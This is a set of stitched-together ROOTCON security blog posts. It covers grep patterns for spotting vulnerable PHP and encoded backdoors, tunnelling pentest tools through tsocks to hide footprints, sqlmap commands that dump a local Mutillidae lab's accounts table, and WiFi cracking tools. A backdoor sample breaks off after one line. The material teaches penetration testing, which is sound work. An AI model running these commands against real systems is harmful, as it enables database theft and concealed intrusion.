ROOTCON Blog

Grep is a powerful command-line tool in Unix and Linux used for searching and probing data sets for lines that matches a regular expression. As a short history, this utility was coded by Ken Thompson on March 3, 1973 for Unix.

Here is a sample or common usage of the said tool for searching a text string pBot in my php file bot.php:

grep pbot bot.php

Alright let's proceed on the objective of this article which is to find common vulnerabilities, backdoor shells and other malicious files using the grep command. For this writeup I'm using grep version 2.9 so if you are using a an older version of GNU grep which is below 2.5.4,  some of the commands in this article may not work although grep. To determine the version of grep you can just type grep -V or grep --version in your terminal. For the other commands and arguments that can be appended to this command line kung fu, you can also type grep --help for more information.

Common Usage for Finding Vulnerabilities
The very reason why most web applications can be easily hacked or pawned because of insecure codes and functions that can be exploited. Take for example command injection or also known as remote code execution in terms of web exploitation, can be possible to a certain website accepts added strings of characters or arguments; the inputs are used as arguments for executing the command in the web server. And because most vulnerable web applications use the shell_exec function. We can use the grep command to search for the shell_exec in as our advantage in our /var/www directory to check for the possible PHP files that are vulnerable to RCE or command injection. Here is the command: 

grep -Rn "shell_exec *( " /var/www
In the image above, we can see that it displays the path of the vulnerable script and the line of the function.

Another example: the include, require, include_once and require_once functions which are common PHP functions in a vulnerable script that is possible for LFI or Local File Inclusion which is a kind of exploit or vulnerability that allows an attacker to inject directory traversal characters on a certain website. 

Again, we can use these functions for searching possible vulnerable scripts in our web server:
grep -Rn "include *(" /var/www
grep -Rn "require *(" /var/www
grep -Rn "include_once *(" /var/www
grep -Rn "require_once *(" /var/www
There are other PHP functions out there that can also be used for finding other web vulnerabilities. Just use Google for other functions :)

Grepping for Backdoor Shells and other Malicious Files

Backdoors are used by web defacers and hackers to maintain access on the web server which allows them to execute arbitrary commands, download files, edit files, and for back-connection. Most backdoor shells use the shell_exec function for command execution. And because most anti-viruses and rootkit scanners can detect backdoor shells, attackers use PHP encoders for evasion. But because functions like base64_decode and eval are used in this technique, they can't escape the wrath of grep. Here is a sample backdoor shell that has upload and system information functions only encoded using Carbylamine PHP Encoder:

<?php function KJnPCP($XZK)

India's 1st Hacking Magazine which is ClubHack or CHmag has just released their April 2012 Issue. CHmag happens to be our media partner and that CHMag is one of the hacking/infosec magazines I'm currently following because of the good contents from various authors  and for this issue I also contributed an article for the Mom's Guide. Here are the topics for this month's issue:

You can download the PDF File here or you could check out the archives for their previous issues in their official website.

About the Contributor:

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.

With some of the applications that don't have proxy configurations or settings, how can we add anonymity to our information gathering, scanning, exploiting phases, etc. like nmapping, using theharvester to gather emails, and many more? It's bad leaving your footprints and logs right?

Well if we have tsocks application then it would be easier since it can send TCP connections automatically through a SOCKS server. If tsocks is not installed on your distro, you can just find it on the software repository. In my case, BackBox Linux has tsocks pre-installed. It can be used for TORifying or tunneling your applications that doesn't have proxy capabilities. Supposed I opened a certain SSH server then binded my localhost at 9191 TCP port, I need to configure /etc/tsocks.conf to:

local = 192.168.0.0/255.255.255.0

server = 127.0.0.1

server_type = 5

server_port = 9191

For TOR, you can just edit the server_port to 9050 because it opens a SOCKS local server at 9050 TCP port.

ssh -D 9191 user@hostname

After configuring tsocks, try to check if tsocks is working good by using the lynx web browser to connect to a website that tells you if you are tunneled or you could also tunnel to another ssh server and issue the command w/who. Be sure to put tsocks before the command. For example:

The IP of the SSH Server ;)

The image below is my original IP without using ssh tunneling:


See the difference ayt!

So if I want to launch theharvester (email harvester) anonymously, I need add tsocks before theharvester command:
tsocks theharvester -d rootcon.org -l 500 -b google


 Now you can run your pentesting tools with added anonymity :)

The ROOTCON Easter Egg Hunt is over, the hunt was pretty simple and straight forward, you just need to know some of the basic arsenal in your day to day hacking escapade.

The Solution:

Easter Egg #1 = The image show Master Yoda speaking the very familiar line "May the source be with you" followed by "A n00b you are". If you are a geek and into tech, you wouldn't miss watching Star Wars, the line "May the force be with you", was replaced with source, meaning it's giving you a hint that the first egg can be found on the source code of the page egg1.php

Easter Egg #2 = Easter Egg #2 has something to deal with braille, we gave the hint "3 blind mice", so you need to decode the braille dots into letters.

Easter Egg #3 = The ROOTCON Vault, this is pretty easy, you can de-crypt the vault using uudecode, or even Perl can unpack it. The first line of the vault says Begin blah blah, this should give you enough hint how it was being encrypted.

Easter Egg #4 = This Easter Egg is very simply, the picture of Cookie Monster says it all plus the text we placed. "Cookie" Monster. "No Cookie For You". The hint tells you that the next word is hidden under the site cookie. There are a lot of Add-ons, Plugins for browsers that will let you examine what is written off its cookie, Google Chrome has its native tool to do that "Developer Tools"

Easter Egg #5 = Again going back to the "image text" for hints, it says "Undress the ROOTCON Easter Bunny". The easter bunny is an image, to undress or to get information under an image you need to examine the EXIF attributes found on the image.

Only the first one to crack all the codes who will be entitle for the 50% discount offer for the ROOTCON 6 ticket.

Here are the top four winners (Click the image to enlarge)
(Note: We masked the Lastname of the winners to protect their identity)




I hope everyone enjoyed our little Easter Special.

ROOTCON

Here we go, ROOTCON Easter Egg Hunt.

Instructions (Read Carefully)
1. Search for each word contained on each egg
2. Gather all words found on each egg
3. Combine all words into one
4. Send your code to registration [at] rootcon d0t org
5. You are entitled for a 50% discount ;-)

Start cracking some eggs at http://easteregg.rootcon.org/

Remember: This is a race, so the promo code is valid for one use only 

GOOD LUCK!!! and HAPPY EASTER 

SQLmap is one of the most common used tools for web application penetration testing because it is open source and automates an sql injection attacks which also allows you to spawn a shell. It has full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB DBMS/ Database Management System. It is also coded in python.

To check all the attributes and options for this tool type sqlmap -h on your terminal.

Suppose we have a vulnerable link after checking it, we append URL target with --dbs to check for the databases:

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' --dbs

After that we should be able to see the back-end DBMS, web server, and most importantly the databases.

Databases enumerated:

[*] dvwa
[*] information_schema
[*] mysql
[*] owasp10

Now let's check all the tables for the owasp10 database. This is the database for the Mutillidae Web Application.

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 --tables

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 -T accounts --dump

Well, that should be it! I hope you were able to understand how to use sqlmap to dump the tables of a certain database.

About the Contributor:

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.

wifite is a mass WEP/WPA WiFi Cracker that is coded in python which makes cracking WIFI passwords and security easier, it uses the aircrack-ng suite. It can be executed by using the command line python wifite.py or ./wifite.py. To see a list of command lines with detailed information for the script, you can just type in the terminal ./wifite.py –help or python wifite.py –help. What makes this tool easier is that it also has a GUI mode which runs by default after executing the script if it has a python-tk module. You can download the python script here.

Fern Wifi Cracker is another GUI for easier wireless penetration testing which uses the aircrack-ng suite of tools. It is coded in python and uses python-qt4. Very similar to wifite because you need macchanger, xterm, and aircrack-ng as its prerequisites. But uses  python-qt4 instead of python-tk for the GUI. You can download this project here.

Gerix Wifi Cracker a simple graphical user interface just like wifite and Fern Wifi Cracker. It is a project made by Tiger Security and has been one of the tools added in BackTrack Linux since the BackTrack 4 Pre-Final if I'm not mistaken. It's also coded in python and you surely need qt (v.3) for this. You can download it here or if you are using BackTrack, you should be able to find this tool in /usr/share/gerix-wifi-cracker-ng.

About the Contributor:

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.

Who Wants To Speak?

ROOTCON is looking for InfoSec Celebrities both local and internationl. If you think you have the skills and talents to be one of the InfoSec celebrities we will be delighted if you will join us =)

As a backgrounder ROOTCON is a grassroots event, organized by users for users.  We welcome attendees from all over the world, after all security is borderless and global in nature.   We support sharing best practices and appreciate cooperation from our international supporters.  If you would like to speak at our event and reside outside the Philippines, we will be happy to sponsor your hotel but are currently not able to sponsor any international airfares due to our volunteer-driven organization.  

 Support the Hacker Community Globally!!!

Hackers Unite